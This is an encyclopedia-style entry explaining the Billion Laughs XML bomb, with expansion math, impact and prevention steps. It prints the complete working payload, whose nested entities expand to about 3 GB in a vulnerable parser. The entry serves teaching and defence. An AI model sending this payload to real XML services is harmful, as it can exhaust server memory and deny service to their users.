Billion Laughs Attack

Billion Laughs Attack (also called XML Bomb or Exponential Entity Expansion) is a denial-of-service attack against XML parsers that uses nested entity definitions to exponentially expand a small XML document into gigabytes of data, exhausting server memory.

How It Works

The attack defines entities that reference other entities in a nested pattern. When the parser expands the final entity, each level multiplies the expansion, creating exponential growth from a small payload.

Classic Billion Laughs Payload

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Expansion Math

• lol = 3 bytes
• lol2 = 10 × lol = 30 bytes
• Each level: 10× previous
• lol9 = 10^9 × 3 bytes = ~3 GB

Impact

• Memory exhaustion → server crash
• CPU exhaustion during parsing
• Denial of service

Prevention

• Disable DTD processing
• Limit entity expansion depth and count
• Set maximum document size limits
• Use streaming parsers with limits

See Also

• XML External Entity
• Document Type Definition